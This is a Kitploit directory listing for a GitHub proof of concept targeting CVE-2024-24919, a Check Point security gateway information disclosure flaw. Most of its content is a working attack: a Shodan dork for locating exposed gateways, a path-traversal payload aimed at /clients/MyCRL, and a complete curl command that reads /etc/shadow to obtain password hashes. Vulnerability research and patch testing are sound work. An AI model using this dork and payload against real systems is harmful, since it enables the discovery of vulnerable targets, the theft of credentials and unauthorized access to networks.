Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-24919_POC — It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd | Kitploit
Tools/GitHubGitHub/sar-3mar/cve-2024-24919_poc
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsar-3mar/cve-2024-24919_poc

CVE-2024-24919_POC

It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-24919_POC

It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd

CVE-2024-24919 Checkpoint security gateway information disclosure vulnerability . U can see it in Notion-CVE-2024-24919_POC

Shodan dork:

title:"Check Point" "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

Payload

aCSHELL/../../../../../../../etc/shadow

  • in path 💡 https://Host/clients/MyCRL > Replace Host by Original IP

Command in Terminal

by curl to take a shadow for passes

curl --path-as-is -i -s -k -X $'POST' -H $'Host: 127.0.0.1' -H $'Content-Length: 39' -H $'Connection: keep-alive' --data-binary $'aCSHELL/../../../../../../../etc/shadow' $ 'https://127.0.0.1/clients/MyCRL'

if u need more info go to notion at first .

see more write-ups Notion-Link-Write-ups

contact with me clickhere

Download Tool